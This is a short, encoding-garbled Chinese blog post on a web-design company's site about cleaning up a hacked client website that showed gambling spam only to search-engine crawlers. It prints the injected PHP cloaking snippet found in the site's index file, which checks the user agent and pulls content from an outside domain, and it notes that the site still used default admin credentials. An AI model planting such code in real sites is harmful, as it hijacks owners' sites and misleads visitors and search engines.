2021-12-19 分類(lèi): 網(wǎng)站建設(shè)
前天 QQ上收到一個(gè)朋友發(fā)來(lái)的消息,問(wèn)我在嗎,我一看是創(chuàng)業(yè)園時(shí)候的朋友,就聊了起來(lái),他所在的公司的客戶的網(wǎng)站被入侵了
但是他和我說(shuō) 他的那個(gè)客戶的網(wǎng)站不是這類(lèi)的,和這個(gè)一點(diǎn)關(guān)系都沒(méi)有,我打開(kāi)了域名看到的實(shí)際內(nèi)容是
是一個(gè)商業(yè)網(wǎng)站,這時(shí)候我的思路很清晰了,首先可以確定的是人和蜘蛛看到的內(nèi)容不一樣,這也是常用黑帽手法,這樣可以獲取大量的外鏈,為了進(jìn)一步確認(rèn)的我思路,我決定用蜘蛛模擬器試試結(jié)果如下圖:
果然和我想的是一樣的,這就證明了我的猜想,這種一般就是在網(wǎng)站根目錄添加一個(gè)畸形文件,讓這個(gè)畸形文件無(wú)法刪除
并且優(yōu)先級(jí)要高于網(wǎng)站本身的權(quán)限,或者是在網(wǎng)站的默認(rèn)文件檔里面加上一段代碼,來(lái)調(diào)用他的文件,來(lái)判斷來(lái)的人還是蜘蛛
如果是蜘蛛就給它顯示博采的內(nèi)容,如果是人就顯示正常的頁(yè)面,在了FTP帳號(hào)密碼 進(jìn)行一步檢查,
發(fā)現(xiàn)用的是我的第二種手法, 在文件內(nèi)加入了以下PHP代碼
$file="http://www.aoxsys.net/seo/3.html";
$referer=$_SERVER["HTTP_REFERER"];
$agent= strtolower($_SERVER["HTTP_USER_aGENT"]);
if(strstr($referer,"baidu")&&strstr($referer,"456"))
{
Header("Location: $url");
}
if ( ereg( "http://www.aoxsys.net/search/spider.htm",$agent ))
{
$content=file_get_contents($file);
echo $content;
exit;
}
>
< php
這個(gè)代碼明白的一看就知道了吧,我就不解釋了,在根目錄還發(fā)現(xiàn)一個(gè)加密的文件,那個(gè)文件貌似是博采的網(wǎng)頁(yè)內(nèi)容,命名為index.asp.asp 接下來(lái)就是替換INDEX.PHP文件 然后刪除相關(guān)后門(mén),打上補(bǔ)丁,
但是當(dāng)我拿到網(wǎng)站后臺(tái)的帳號(hào)密碼的時(shí)候我崩潰了,密碼竟然 是默認(rèn)的,帳號(hào)也是默認(rèn)的,程序是DEDE 存在安全漏洞
修補(bǔ)漏洞 用DEDE的安全檢測(cè)工具稍微檢查了一下木馬和WEBSHELL 沒(méi)有多余發(fā)現(xiàn),打上補(bǔ)丁收工,再用蜘蛛模擬器查看
網(wǎng)站內(nèi)容和蜘蛛的爬行內(nèi)容一致了 接下來(lái)就是@蜘蛛了 讓蜘蛛過(guò)來(lái)爬 收錄并更新快照 什么怎么@蜘蛛嗎 這你都不會(huì)嗎
那我也不會(huì) 嘿嘿!
分享名稱(chēng):解決網(wǎng)站快照與網(wǎng)站實(shí)際內(nèi)容不符
網(wǎng)站鏈接:http://www.rwnh.cn/news/141052.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站收錄、品牌網(wǎng)站建設(shè)、企業(yè)網(wǎng)站制作、網(wǎng)站導(dǎo)航、網(wǎng)站制作、做網(wǎng)站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容